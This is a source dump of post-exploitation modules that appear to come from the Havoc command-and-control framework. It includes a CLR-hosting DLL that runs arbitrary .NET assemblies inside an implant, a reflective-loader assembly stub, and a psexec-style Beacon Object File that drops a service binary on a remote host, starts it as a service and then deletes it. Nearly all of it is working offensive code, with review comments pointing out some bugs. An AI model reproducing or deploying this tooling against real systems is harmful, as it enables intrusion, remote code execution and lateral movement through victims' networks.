        demon.ConsoleWrite(demon.CONSOLE_ERROR, "Not enough arguments")
        return

    try:
        # NOTE(review): the file object is never closed — wrap in `with open(...)`.
        Assembly = open( param[ 0 ], 'rb' )

        # AppDomain name and CLR version string consumed by InvokeAssembly.c.
        packer.addstr( "DefaultAppDomain" )
        packer.addstr( "v4.0.30319" )
        # NOTE(review): Assembly.read() is bytes; str() of bytes is its repr
        # text ("b'...'"), not the raw image — confirm what Packer.addstr and
        # the DLL-side parser expect here.
        packer.addstr( str(Assembly.read()) )
        # NOTE(review): ''.join concatenates the remaining params with no
        # separator — if the client tokenises on whitespace, the spaces are
        # lost. The leading space presumably yields a throwaway first token,
        # which the DLL skips (InvokeAssembly.c advances past element 0 of
        # CommandLineToArgvW) — confirm.
        packer.addstr( " " + ''.join( param[ 1: ] ) )

    except OSError:
        demon.ConsoleWrite( demon.CONSOLE_ERROR, "Failed to open assembly file: " + param[ 0 ] )
        return

    arg = packer.getbuffer()

    demon.DllSpawn( TaskID, f"bin/InvokeAssembly.{demon.ProcessArch}.dll", arg )

    return TaskID

RegisterCommand( InvokeAssembly, "dotnet", "execute", "executes a dotnet assembly in a seperate process", 0, "[/path/to/assembl.exe] (args)", "/tmp/Seatbelt.exe -group=user" )
--------------------------------------------------------------------------------
/InvokeAssembly/makefile:
--------------------------------------------------------------------------------
MAKEFLAGS += -s

NAME = InvokeAssembly

# Only the x64 target below is defined; COMPILER_x86 is unused.
COMPILER_x86 = i686-w64-mingw32-gcc
COMPILER_x64 = x86_64-w64-mingw32-gcc

# -shared: the output is a DLL. -s strips symbols, -w silences all warnings
# (including the type mismatches noted in the headers).
CFLAGS = -Os -fno-asynchronous-unwind-tables -shared -masm=intel
CFLAGS += -fno-ident -fpack-struct=8 -falign-functions=1
CFLAGS += -s -ffunction-sections -falign-jumps=1 -w
CFLAGS += -falign-labels=1 -fPIC
CFLAGS += -Wl,-s,--no-seh,--enable-stdcall-fixup
CFLAGS += -l oleaut32 -l uuid

INCLUDE = -I include
SOURCE = $(wildcard src/*.c)

# Assemble Util.s with nasm first so it is picked up via src/*.o, link the
# DLL, then remove the intermediate objects.
x64:
	nasm -f win64 src/Util.s -o src/Util.o
	$(COMPILER_x64) src/*.o $(INCLUDE) $(SOURCE) $(CFLAGS) -o bin/$(NAME).x64.dll -lntdll -luser32
	rm src/*.o
--------------------------------------------------------------------------------
/InvokeAssembly/src/DllMain.c:
--------------------------------------------------------------------------------
/**
 * KaynLdr
 * Author: Paul Ungur (@C5pider)
 */

/* NOTE(review): include targets missing in this copy of the file. */
#include
#include
#include

HINSTANCE hAppInstance = NULL;
/* Global module state declared in DModule.h; populated by ModuleInit(). */
INSTANCE Instance = { 0 };

/*
 * DLL entry point. DLL_QUERY_HMODULE (6, from KaynLdr.h) is a custom reason
 * code that returns the module base through lpReserved. On
 * DLL_PROCESS_ATTACH the argument buffer is taken from lpReserved
 * (NOTE(review): non-standard — presumably set up by the loader / DllSpawn,
 * confirm), the assembly is run, and the process is ended with
 * ExitProcess( 0 ), so this path never returns and no later case is reached
 * from it.
 */
BOOL WINAPI DllMain( HINSTANCE hInstDLL, DWORD dwReason, LPVOID lpReserved )
{
    BOOL bReturnValue = TRUE;

    switch( dwReason )
    {
        case DLL_QUERY_HMODULE:
            if( lpReserved != NULL )
                *( HMODULE* ) lpReserved = hAppInstance;
            break;

        case DLL_PROCESS_ATTACH:
        {
            hAppInstance = hInstDLL;

            ModuleInit();
            ModuleMain( lpReserved );

            /* printf output goes through msvcrt's stdout; flush before exiting. */
            fflush( stdout );
            ExitProcess( 0 );
        }

        case DLL_PROCESS_DETACH:
        case DLL_THREAD_ATTACH:
        case DLL_THREAD_DETACH:
            break;
    }

    return bReturnValue;
}

/* Resolve printf from msvcrt and CLRCreateInstance from mscoree into Instance. */
VOID ModuleInit()
{
    Instance.Modules.Msvcrt = LoadLibraryA( "Msvcrt" );
    if ( Instance.Modules.Msvcrt )
    {
        Instance.Win32.printf = GetProcAddress( Instance.Modules.Msvcrt, "printf" );
    }

    Instance.Modules.Mscoree = LoadLibraryA( "Mscoree" );
    /* NOTE(review): this tests Msvcrt, but the module just loaded is Mscoree —
     * if LoadLibraryA( "Mscoree" ) fails, GetProcAddress is called with a NULL
     * module. The condition should be Instance.Modules.Mscoree. */
    if ( Instance.Modules.Msvcrt )
    {
        Instance.Win32.CLRCreateInstance = GetProcAddress( Instance.Modules.Mscoree, "CLRCreateInstance" );
    }
}

/* Wrap the raw argument buffer (the lpReserved pointer from DllMain) in a
 * PARSER and hand it to InvokeAssembly(). */
VOID ModuleMain( PVOID Params )
{
    PARSER Parser = { 0 };
    ParserNew( &Parser, Params );

    InvokeAssembly( &Parser );
}
--------------------------------------------------------------------------------
/InvokeAssembly/src/InvokeAssembly.c:
--------------------------------------------------------------------------------
/* NOTE(review): include target missing in this copy of the file. */
#include

/* COM identifiers used for CLR hosting (meta host, runtime host and the
 * AppDomain interface used by Load_3), defined locally rather than taken from
 * the SDK's GUID libraries — presumably to avoid the extra link inputs. */
GUID xCLSID_CLRMetaHost = { 0x9280188d, 0xe8e, 0x4867, { 0xb3, 0xc, 0x7f, 0xa8, 0x38, 0x84, 0xe8, 0xde } };
GUID xCLSID_CorRuntimeHost = { 0xcb2f6723, 0xab3a, 0x11d2, { 0x9c, 0x40, 0x00, 0xc0, 0x4f, 0xa3, 0x0a, 0x3e } };
GUID xIID_AppDomain = { 0x05F696DC, 0x2B29, 0x3663, { 0xAD, 0x8B, 0xC4, 0x38, 0x9C, 0xF2, 0xA7, 0x13 } };
GUID xIID_ICLRMetaHost = { 0xD332DB9E, 0xB9B3, 0x4125, { 0x82, 0x07, 0xA1, 0x48, 0x84, 0xF5, 0x32, 0x16 } };
GUID xIID_ICLRRuntimeInfo = { 0xBD39D1D2, 0xBA2F, 0x486a, { 0x89, 0xB0, 0xB4, 0xB0, 0xCB, 0x46, 0x68, 0x91 } };
GUID xIID_ICorRuntimeHost = { 0xcb2f6722, 0xab3a, 0x11d2, { 0x9c, 0x40, 0x00, 0xc0, 0x4f, 0xa3, 0x0a, 0x3e } };

/*
 * Scan `length` bytes of `assembly` for the ASCII string "v4.0.30319" (the
 * bytes in v4[]). Returns 1 at the first match, 0 otherwise.
 *
 * NOTE(review): the inner loop indexes assembly_c[ i + j ] without checking
 * i + j < length, so the last nine start positions read up to 9 bytes past
 * the buffer; the outer bound should be i <= length - 10 (and return early
 * for length < 10). Nothing visible on this page calls this function — the
 * runtime version string is supplied by the client (invokeassembly.py packs
 * "v4.0.30319").
 */
BOOL FindVersion( PVOID assembly, INT length )
{
    PCHAR assembly_c = (char*)assembly;

    CHAR v4[] = { 0x76, 0x34, 0x2E, 0x30, 0x2E, 0x33, 0x30, 0x33, 0x31, 0x39 };

    for ( INT i = 0; i < length; i++ )
    {
        for ( INT j = 0; j < 10; j++ )
        {
            if ( v4[ j ] != assembly_c[ i + j ] )
                break;
            else
            {
                if ( j == 9 )
                    return 1;
            }
        }
    }

    return 0;
}

VOID
InvokeAssembly( PPARSER DataArgs ) 34 | { 35 | SIZE_T AppDomainNameSize = 0; 36 | SIZE_T NetVersionSize = 0; 37 | SIZE_T assemblyBytesLen = 0; 38 | SIZE_T ArgumentsLen = 0; 39 | 40 | PUCHAR AppDomainName = ParserGetBytes( DataArgs, &AppDomainNameSize ); 41 | PUCHAR NetVersion = ParserGetBytes( DataArgs, &NetVersionSize ); 42 | PUCHAR assemblyBytes = ParserGetBytes( DataArgs, &assemblyBytesLen ); 43 | PUCHAR Arguments = ParserGetBytes( DataArgs, &ArgumentsLen ); 44 | 45 | WCHAR wAppDomainName[ MAX_PATH ] = { 0 }; 46 | WCHAR wNetVersion[ 20 ] = { 0 }; 47 | PWCHAR wArguments = LocalAlloc( LPTR, ArgumentsLen * sizeof( WCHAR ) ); 48 | 49 | // CLR & .Net Instances 50 | ICLRMetaHost* pClrMetaHost = { NULL }; 51 | ICLRRuntimeInfo* pClrRuntimeInfo = { NULL }; 52 | ICorRuntimeHost* pICorRuntimeHost = { NULL }; 53 | Assembly* pAssembly = { NULL }; 54 | IUnknown* pAppDomainThunk = { NULL }; 55 | AppDomain* pAppDomain = { NULL }; 56 | MethodInfo* pMethodInfo = { NULL }; 57 | VARIANT vtPsa = { 0 }; 58 | LPVOID pvData = { NULL }; 59 | 60 | VARIANT retVal = { 0 }; 61 | VARIANT obj = { 0 }; 62 | 63 | 64 | // Convert Ansi Strings to Wide Strings 65 | CharStringToWCharString( wAppDomainName, AppDomainName, AppDomainNameSize ); 66 | CharStringToWCharString( wNetVersion, NetVersion, NetVersionSize ); 67 | CharStringToWCharString( wArguments, Arguments, ArgumentsLen ); 68 | 69 | if ( assemblyBytes == NULL ) 70 | return; 71 | 72 | // Hosting CLR 73 | if ( ! 
W32CreateClrInstance( wNetVersion, &pClrMetaHost, &pClrRuntimeInfo, &pICorRuntimeHost ) ) 74 | { 75 | Instance.Win32.printf( "[-] Couldn't start CLR \n" ); 76 | return; 77 | } 78 | 79 | SAFEARRAYBOUND rgsabound[1] = { 0 }; 80 | rgsabound[0].cElements = assemblyBytesLen; 81 | rgsabound[0].lLbound = 0; 82 | SAFEARRAY* pSafeArray = SafeArrayCreate(VT_UI1, 1, rgsabound); 83 | 84 | if ( pICorRuntimeHost->lpVtbl->CreateDomain( pICorRuntimeHost, wAppDomainName, NULL, &pAppDomainThunk ) != S_OK ) 85 | goto Cleanup; 86 | 87 | if ( pAppDomainThunk->lpVtbl->QueryInterface( pAppDomainThunk, &xIID_AppDomain, &pAppDomain ) != S_OK ) 88 | goto Cleanup; 89 | 90 | if ( SafeArrayAccessData( pSafeArray, &pvData ) != S_OK ) 91 | goto Cleanup; 92 | 93 | MemCopy(pvData, assemblyBytes, assemblyBytesLen); 94 | 95 | if ( SafeArrayUnaccessData( pSafeArray ) != S_OK ) 96 | Instance.Win32.printf("[-] SafeArrayUnaccessData: Failed\n"); 97 | 98 | if ( pAppDomain->lpVtbl->Load_3( pAppDomain, pSafeArray, &pAssembly ) != S_OK ) 99 | goto Cleanup; 100 | 101 | if ( pAssembly->lpVtbl->EntryPoint( pAssembly, &pMethodInfo ) != S_OK ) 102 | goto Cleanup; 103 | 104 | obj.vt = VT_NULL; 105 | 106 | SAFEARRAY* psaStaticMethodArgs = SafeArrayCreateVector( VT_VARIANT, 0, 1 ); //Last field -> entryPoint == 1 is needed if Main(String[] args) 0 if Main() 107 | 108 | DWORD argumentCount; 109 | LPWSTR* argumentsArray = CommandLineToArgvW( wArguments, &argumentCount ); 110 | 111 | argumentsArray++; 112 | argumentCount--; 113 | 114 | vtPsa.vt = ( VT_ARRAY | VT_BSTR ); 115 | vtPsa.parray = SafeArrayCreateVector( VT_BSTR, 0, argumentCount ); 116 | 117 | for ( INT i = 0; i <= argumentCount; i++ ) 118 | SafeArrayPutElement( vtPsa.parray, &i, SysAllocString( argumentsArray[ i ] ) ); 119 | 120 | long idx[1] = { 0 }; 121 | SafeArrayPutElement(psaStaticMethodArgs, idx, &vtPsa); 122 | 123 | if ( pMethodInfo->lpVtbl->Invoke_3( pMethodInfo, obj, psaStaticMethodArgs, &retVal ) != S_OK ) 124 | goto Cleanup; 125 | 126 | 127 | 128 
| Cleanup: 129 | if ( NULL != psaStaticMethodArgs ) 130 | { 131 | SafeArrayDestroy( psaStaticMethodArgs ); 132 | psaStaticMethodArgs = NULL; 133 | } 134 | 135 | if ( pMethodInfo != NULL ) 136 | { 137 | pMethodInfo->lpVtbl->Release( pMethodInfo ); 138 | pMethodInfo = NULL; 139 | } 140 | 141 | if ( pAssembly != NULL ) 142 | { 143 | pAssembly->lpVtbl->Release( pAssembly ); 144 | pAssembly = NULL; 145 | } 146 | 147 | if (pAppDomain != NULL) 148 | { 149 | pAppDomain->lpVtbl->Release( pAppDomain ); 150 | pAppDomain = NULL; 151 | } 152 | 153 | if ( pAppDomainThunk != NULL ) 154 | pAppDomainThunk->lpVtbl->Release( pAppDomainThunk ); 155 | 156 | if ( pICorRuntimeHost != NULL ) 157 | { 158 | pICorRuntimeHost->lpVtbl->UnloadDomain( pICorRuntimeHost, pAppDomainThunk ); 159 | pICorRuntimeHost->lpVtbl->Stop( pICorRuntimeHost ); 160 | pICorRuntimeHost = NULL; 161 | } 162 | 163 | if ( pClrRuntimeInfo != NULL ) 164 | { 165 | pClrRuntimeInfo->lpVtbl->Release( pClrRuntimeInfo ); 166 | pClrRuntimeInfo = NULL; 167 | } 168 | 169 | if ( pClrMetaHost != NULL ) 170 | { 171 | pClrMetaHost->lpVtbl->Release( pClrMetaHost ); 172 | pClrMetaHost = NULL; 173 | } 174 | } 175 | 176 | BOOL W32CreateClrInstance( LPCWSTR dotNetVersion, PICLRMetaHost *ppClrMetaHost, PICLRRuntimeInfo *ppClrRuntimeInfo, ICorRuntimeHost **ppICorRuntimeHost ) 177 | { 178 | BOOL fLoadable = FALSE; 179 | 180 | if ( Instance.Win32.CLRCreateInstance( &xCLSID_CLRMetaHost, &xIID_ICLRMetaHost, ppClrMetaHost ) == S_OK ) 181 | { 182 | if ( ( *ppClrMetaHost )->lpVtbl->GetRuntime( *ppClrMetaHost, dotNetVersion, &xIID_ICLRRuntimeInfo, (LPVOID*)ppClrRuntimeInfo ) == S_OK ) 183 | { 184 | if ( ( ( *ppClrRuntimeInfo )->lpVtbl->IsLoadable( *ppClrRuntimeInfo, &fLoadable ) == S_OK ) && fLoadable ) 185 | { 186 | //Load the CLR into the current process and return a runtime interface pointer. 
-> CLR changed to ICor which is deprecated but works 187 | if ( ( *ppClrRuntimeInfo )->lpVtbl->GetInterface( *ppClrRuntimeInfo, &xCLSID_CorRuntimeHost, &xIID_ICorRuntimeHost, ppICorRuntimeHost ) == S_OK ) 188 | { 189 | //Start it. This is okay to call even if the CLR is already running 190 | ( *ppICorRuntimeHost )->lpVtbl->Start( *ppICorRuntimeHost ); 191 | } 192 | else 193 | { 194 | Instance.Win32.printf("[-] ( GetInterface ) Process refusing to get interface of %ls CLR version. Try running an assembly that requires a different CLR version.\n", dotNetVersion); 195 | return 0; 196 | } 197 | } 198 | else 199 | { 200 | Instance.Win32.printf("[-] ( IsLoadable ) Process refusing to load %ls CLR version. Try running an assembly that requires a different CLR version.\n", dotNetVersion); 201 | return 0; 202 | } 203 | } 204 | else 205 | { 206 | Instance.Win32.printf("[-] ( GetRuntime ) Process refusing to get runtime of %ls CLR version. Try running an assembly that requires a different CLR version.\n", dotNetVersion); 207 | return 0; 208 | } 209 | } 210 | else 211 | { 212 | Instance.Win32.printf("[-] ( CLRCreateInstance ) Process refusing to create %ls CLR version. 
Try running an assembly that requires a different CLR version.\n", dotNetVersion); 213 | return 0; 214 | } 215 | 216 | return 1; 217 | } -------------------------------------------------------------------------------- /InvokeAssembly/src/Parser.c: -------------------------------------------------------------------------------- 1 | 2 | #include 3 | #include 4 | 5 | VOID ParserNew( PPARSER parser, PCHAR buffer ) 6 | { 7 | UINT32 Size = 0; 8 | 9 | if ( parser == NULL ) 10 | return; 11 | 12 | memcpy( &Size, buffer, sizeof( UINT32 ) ); 13 | 14 | parser->buffer = buffer + sizeof( UINT32 ); 15 | parser->original = buffer; 16 | parser->length = Size - sizeof( UINT32 ); 17 | } 18 | 19 | INT32 ParserGetInt32( PPARSER parser ) 20 | { 21 | INT32 intBytes = 0; 22 | 23 | if ( parser->length < 4 ) 24 | return 0; 25 | 26 | memcpy( &intBytes, parser->buffer, 4 ); 27 | 28 | parser->buffer += 4; 29 | parser->length -= 4; 30 | 31 | return ( INT ) intBytes; 32 | } 33 | 34 | PCHAR ParserGetBytes( PPARSER parser, PINT size ) 35 | { 36 | UINT32 length = 0; 37 | PCHAR outdata = NULL; 38 | 39 | if ( parser->length < 4 ) 40 | return NULL; 41 | 42 | memcpy( &length, parser->buffer, 4 ); 43 | parser->buffer += 4; 44 | 45 | outdata = parser->buffer; 46 | if ( outdata == NULL ) 47 | return NULL; 48 | 49 | parser->length -= 4; 50 | parser->length -= length; 51 | parser->buffer += length; 52 | 53 | if ( size != NULL ) 54 | *size = length; 55 | 56 | return outdata; 57 | } -------------------------------------------------------------------------------- /InvokeAssembly/src/Util.s: -------------------------------------------------------------------------------- 1 | ; KaynLdr 2 | ; Author: Paul Ungur (@C5pider) 3 | ; Credits: Austin Hudson (@ilove2pwn_), Chetan Nayak (@NinjaParanoid), Bobby Cooke (@0xBoku), @trickster012 4 | ; 5 | 6 | global KaynCaller 7 | 8 | section .text 9 | 10 | ; Shameless copied from Bobby Cooke CobaltStrikeReflectiveLoader (https://github.com/boku7/CobaltStrikeReflectiveLoader) 
11 | KaynCaller: 12 | call pop 13 | pop: 14 | pop rcx 15 | loop: 16 | xor rbx, rbx 17 | mov ebx, 0x5A4D 18 | dec rcx 19 | cmp bx, word ds:[ rcx ] 20 | jne loop 21 | xor rax, rax 22 | mov ax, [ rcx + 0x3C ] 23 | add rax, rcx 24 | xor rbx, rbx 25 | add bx, 0x4550 26 | cmp bx, word ds:[ rax ] 27 | jne loop 28 | mov rax, rcx 29 | ret -------------------------------------------------------------------------------- /InvokeAssembly/src/Win32.c: -------------------------------------------------------------------------------- 1 | 2 | #include 3 | 4 | SIZE_T CharStringToWCharString(PWCHAR Destination, PCHAR Source, SIZE_T MaximumAllowed) 5 | { 6 | INT Length = MaximumAllowed; 7 | 8 | while (--Length >= 0) 9 | { 10 | if (!(*Destination++ = *Source++)) 11 | return MaximumAllowed - Length - 1; 12 | } 13 | 14 | return MaximumAllowed - Length; 15 | } -------------------------------------------------------------------------------- /Jump-exec/DCOM/dcom.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/Jump-exec/DCOM/dcom.x86.o -------------------------------------------------------------------------------- /Jump-exec/Psexec/beacon.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Beacon Object Files (BOF) 3 | * ------------------------- 4 | * A Beacon Object File is a light-weight post exploitation tool that runs 5 | * with Beacon's inline-execute command. 6 | * 7 | * Cobalt Strike 4.1. 
8 | */ 9 | 10 | /* data API */ 11 | typedef struct { 12 | char * original; /* the original buffer [so we can free it] */ 13 | char * buffer; /* current pointer into our buffer */ 14 | int length; /* remaining length of data */ 15 | int size; /* total size of this buffer */ 16 | } datap; 17 | 18 | DECLSPEC_IMPORT void BeaconDataParse(datap * parser, char * buffer, int size); 19 | DECLSPEC_IMPORT int BeaconDataInt(datap * parser); 20 | DECLSPEC_IMPORT short BeaconDataShort(datap * parser); 21 | DECLSPEC_IMPORT int BeaconDataLength(datap * parser); 22 | DECLSPEC_IMPORT char * BeaconDataExtract(datap * parser, int * size); 23 | 24 | /* format API */ 25 | typedef struct { 26 | char * original; /* the original buffer [so we can free it] */ 27 | char * buffer; /* current pointer into our buffer */ 28 | int length; /* remaining length of data */ 29 | int size; /* total size of this buffer */ 30 | } formatp; 31 | 32 | DECLSPEC_IMPORT void BeaconFormatAlloc(formatp * format, int maxsz); 33 | DECLSPEC_IMPORT void BeaconFormatReset(formatp * format); 34 | DECLSPEC_IMPORT void BeaconFormatFree(formatp * format); 35 | DECLSPEC_IMPORT void BeaconFormatAppend(formatp * format, char * text, int len); 36 | DECLSPEC_IMPORT void BeaconFormatPrintf(formatp * format, char * fmt, ...); 37 | DECLSPEC_IMPORT char * BeaconFormatToString(formatp * format, int * size); 38 | DECLSPEC_IMPORT void BeaconFormatInt(formatp * format, int value); 39 | 40 | /* Output Functions */ 41 | #define CALLBACK_OUTPUT 0x0 42 | #define CALLBACK_OUTPUT_OEM 0x1e 43 | #define CALLBACK_ERROR 0x0d 44 | #define CALLBACK_OUTPUT_UTF8 0x20 45 | 46 | DECLSPEC_IMPORT void BeaconPrintf(int type, char * fmt, ...); 47 | DECLSPEC_IMPORT void BeaconOutput(int type, char * data, int len); 48 | 49 | /* Token Functions */ 50 | DECLSPEC_IMPORT BOOL BeaconUseToken(HANDLE token); 51 | DECLSPEC_IMPORT void BeaconRevertToken(); 52 | DECLSPEC_IMPORT BOOL BeaconIsAdmin(); 53 | 54 | /* Spawn+Inject Functions */ 55 | DECLSPEC_IMPORT void 
BeaconGetSpawnTo(BOOL x86, char * buffer, int length); 56 | DECLSPEC_IMPORT void BeaconInjectProcess(HANDLE hProc, int pid, char * payload, int p_len, int p_offset, char * arg, int a_len); 57 | DECLSPEC_IMPORT void BeaconInjectTemporaryProcess(PROCESS_INFORMATION * pInfo, char * payload, int p_len, int p_offset, char * arg, int a_len); 58 | DECLSPEC_IMPORT void BeaconCleanupProcess(PROCESS_INFORMATION * pInfo); 59 | 60 | /* Utility Functions */ 61 | DECLSPEC_IMPORT BOOL toWideChar(char * src, wchar_t * dst, int max); -------------------------------------------------------------------------------- /Jump-exec/Psexec/makefile: -------------------------------------------------------------------------------- 1 | BOF := psexec 2 | CC_x64 := x86_64-w64-mingw32-gcc 3 | CC_x86 := i686-w64-mingw32-gcc 4 | STRIP_x64 := x86_64-w64-mingw32-strip 5 | STRIP_x86 := i686-w64-mingw32-strip 6 | 7 | all: 8 | $(CC_x64) -o $(BOF).x64.o -c $(BOF).c 9 | $(STRIP_x64) --strip-unneeded $(BOF).x64.o 10 | $(CC_x86) -o $(BOF).x86.o -c $(BOF).c 11 | $(STRIP_x86) --strip-unneeded $(BOF).x86.o 12 | 13 | clean: 14 | rm $(BOF).o -------------------------------------------------------------------------------- /Jump-exec/Psexec/psexec.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include "beacon.h" 3 | 4 | /* Havoc console output modes */ 5 | #define HAVOC_CONSOLE_GOOD 0x90 6 | #define HAVOC_CONSOLE_INFO 0x91 7 | #define HAVOC_CONSOLE_ERRO 0x92 8 | 9 | /* Defines */ 10 | WINBASEAPI HANDLE WINAPI KERNEL32$CreateFileA( 11 | LPCSTR lpFileName, 12 | DWORD dwDesiredAccess, 13 | DWORD dwShareMode, 14 | LPSECURITY_ATTRIBUTES lpSecurityAttributes, 15 | DWORD dwCreationDisposition, 16 | DWORD dwFlagsAndAttributes, 17 | HANDLE hTemplateFile 18 | ); 19 | 20 | WINBASEAPI BOOL WINAPI KERNEL32$WriteFile( 21 | HANDLE hFile, 22 | LPCVOID lpBuffer, 23 | DWORD nNumberOfBytesToWrite, 24 | LPDWORD lpNumberOfBytesWritten, 25 | LPOVERLAPPED lpOverlapped 26 | ); 27 | 
28 | WINADVAPI SC_HANDLE WINAPI ADVAPI32$OpenSCManagerA( 29 | LPCSTR lpMachineName, 30 | LPCSTR lpDatabaseName, 31 | DWORD dwDesiredAccess 32 | ); 33 | 34 | WINADVAPI SC_HANDLE WINAPI ADVAPI32$CreateServiceA( 35 | SC_HANDLE hSCManager, 36 | LPCSTR lpServiceName, 37 | LPCSTR lpDisplayName, 38 | DWORD dwDesiredAccess, 39 | DWORD dwServiceType, 40 | DWORD dwStartType, 41 | DWORD dwErrorControl, 42 | LPCSTR lpBinaryPathName, 43 | LPCSTR lpLoadOrderGroup, 44 | LPDWORD lpdwTagId, 45 | LPCSTR lpDependencies, 46 | LPCSTR lpServiceStartName, 47 | LPCSTR lpPassword 48 | ); 49 | 50 | WINADVAPI WINBOOL WINAPI ADVAPI32$StartServiceA( 51 | SC_HANDLE hService, 52 | DWORD dwNumServiceArgs, 53 | LPCSTR* lpServiceArgVectors 54 | ); 55 | 56 | 57 | WINADVAPI WINBOOL WINAPI ADVAPI32$CloseServiceHandle( SC_HANDLE hSCObject ); 58 | WINADVAPI WINBOOL WINAPI ADVAPI32$DeleteService( SC_HANDLE hService ); 59 | WINBASEAPI DWORD WINAPI KERNEL32$GetLastError(); 60 | WINBASEAPI VOID WINAPI KERNEL32$CloseHandle( HANDLE Handle ); 61 | WINBASEAPI BOOL WINAPI KERNEL32$DeleteFileA( LPCSTR lpFileName ); 62 | /* psexec entrypoint code */ 63 | VOID go( PVOID Buffer, ULONG Length ) 64 | { 65 | datap Parser = { 0 }; 66 | DWORD SvcBinarySize = 0; 67 | DWORD Written = 0; 68 | PCHAR Host = NULL; 69 | PCHAR SvcName = NULL; 70 | PCHAR SvcBinary = NULL; 71 | PCHAR SvcPath = NULL; 72 | BOOL Success = FALSE; 73 | 74 | HANDLE hFile = NULL; 75 | HANDLE hSvcManager = NULL; 76 | HANDLE hSvcService = NULL; 77 | 78 | /* Prepare our argument buffer */ 79 | BeaconDataParse( &Parser, Buffer, Length ); 80 | 81 | /* Parse our arguments */ 82 | Host = BeaconDataExtract( &Parser, NULL ); 83 | SvcName = BeaconDataExtract( &Parser, NULL ); 84 | SvcBinary = BeaconDataExtract( &Parser, &SvcBinarySize ); 85 | SvcPath = BeaconDataExtract( &Parser, NULL ); 86 | 87 | // BeaconPrintf( HAVOC_CONSOLE_GOOD, "Psexec [Host: %s] [SvcName: %s] [SvcPath: %s]", Host, SvcName, SvcPath ); 88 | 89 | /* Upload service file to target machine 
(overwrite existing file)*/ 90 | hFile = KERNEL32$CreateFileA( SvcPath, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL ); 91 | if ( hFile == INVALID_HANDLE_VALUE ) 92 | { 93 | BeaconPrintf( HAVOC_CONSOLE_ERRO, "CreateFileA Failed: %d", KERNEL32$GetLastError() ); 94 | goto EXIT; 95 | } 96 | 97 | if ( ! KERNEL32$WriteFile( hFile, SvcBinary, SvcBinarySize, &Written, NULL ) ) 98 | { 99 | BeaconPrintf( HAVOC_CONSOLE_ERRO, "WriteFile Failed: %d", KERNEL32$GetLastError() ); 100 | goto EXIT; 101 | } 102 | 103 | BeaconPrintf( HAVOC_CONSOLE_INFO, "Dropped service executable on %s at %s", Host, SvcPath ); 104 | 105 | /* Close the file */ 106 | KERNEL32$CloseHandle( hFile ); 107 | hFile = NULL; 108 | 109 | /* Open Service manager. Create and start our service. The magic happens here :P */ 110 | // NOTE: OpenSCManagerA is going to use SERVICES_ACTIVE_DATABASE by default if lpDatabaseName == NULL. 111 | hSvcManager = ADVAPI32$OpenSCManagerA( Host, NULL, SC_MANAGER_ALL_ACCESS ); 112 | if ( ! hSvcManager ) 113 | { 114 | BeaconPrintf( HAVOC_CONSOLE_ERRO, "OpenSCManagerA Failed: %d", KERNEL32$GetLastError() ); 115 | goto EXIT; 116 | } 117 | 118 | hSvcService = ADVAPI32$CreateServiceA( hSvcManager, SvcName, NULL, SERVICE_ALL_ACCESS, SERVICE_WIN32_OWN_PROCESS, SERVICE_DEMAND_START, SERVICE_ERROR_IGNORE, SvcPath, NULL, NULL, NULL, NULL, NULL ); 119 | if ( ! hSvcService ) 120 | { 121 | BeaconPrintf( HAVOC_CONSOLE_ERRO, "CreateServiceA Failed: %d", KERNEL32$GetLastError() ); 122 | goto EXIT; 123 | } 124 | 125 | BeaconPrintf( HAVOC_CONSOLE_INFO, "Starting Service executable..." ); 126 | 127 | // TODO: check if service is dead after starting it. maybe we trying to start a buggy one... 128 | // TODO: add check for ERROR_SERVICE_REQUEST_TIMEOUT 129 | if ( ! 
ADVAPI32$StartServiceA( hSvcService, 0, NULL ) ) 130 | { 131 | BeaconPrintf( HAVOC_CONSOLE_ERRO, "CreateServiceA Failed: %d", KERNEL32$GetLastError() ); 132 | goto EXIT; 133 | } 134 | 135 | BeaconPrintf( HAVOC_CONSOLE_INFO, "Successful started Service executable" ); 136 | 137 | if ( ! KERNEL32$DeleteFileA( SvcPath ) ) 138 | BeaconPrintf( HAVOC_CONSOLE_ERRO, "Failed to delete service executable %s from %s Error:[%d]", SvcPath, Host, KERNEL32$GetLastError() ); 139 | else 140 | BeaconPrintf( HAVOC_CONSOLE_INFO, "Deleted service executable %s from %s", SvcPath, Host ); 141 | 142 | Success = TRUE; 143 | 144 | EXIT: 145 | if ( hFile ) 146 | { 147 | KERNEL32$CloseHandle( hFile ); 148 | hFile = NULL; 149 | } 150 | /* NOTE(review): DeleteService() is called before the NULL check on hSvcService, so on the early-exit paths above it runs with a NULL handle and only logs the error. The message printed on line 131 says "CreateServiceA" although the failing call there is StartServiceA. */ 151 | if ( ! ADVAPI32$DeleteService( hSvcService ) ) 152 | BeaconPrintf( HAVOC_CONSOLE_ERRO, "Failed to delete Service %s on %s: %d", SvcName, Host, KERNEL32$GetLastError() ); 153 | 154 | if ( hSvcService ) 155 | { 156 | ADVAPI32$CloseServiceHandle( hSvcService ); 157 | hSvcService = NULL; 158 | } 159 | 160 | if ( hSvcManager ) 161 | { 162 | ADVAPI32$CloseServiceHandle( hSvcManager ); 163 | hSvcManager = NULL; 164 | } 165 | 166 | if ( Success ) 167 | BeaconPrintf( HAVOC_CONSOLE_GOOD, "psexec successful executed on %s", Host ); 168 | else 169 | BeaconPrintf( HAVOC_CONSOLE_ERRO, "psexec failed to execut on %s", Host ); 170 | } 171 | -------------------------------------------------------------------------------- /Jump-exec/Psexec/psexec.py: -------------------------------------------------------------------------------- 1 | from havoc import Demon, RegisterCommand, RegisterModule 2 | from os.path import exists 3 | 
# Client-side handler for the "jump-exec psexec" command.
# Takes exactly three positional arguments, [Host] [Service Name] [Local Path],
# reads the local file, packs host, service name, the file bytes and the
# remote drop path, and tasks the demon to inline-execute "go" from the
# arch-specific psexec.<arch>.o with that buffer.
# Returns the TaskID from ConsoleWrite, or False after reporting an argument
# or file error on the console.
# NOTE(review): Packer is used below but not imported on line 1; presumably it
# is provided by the havoc runtime namespace -- confirm.
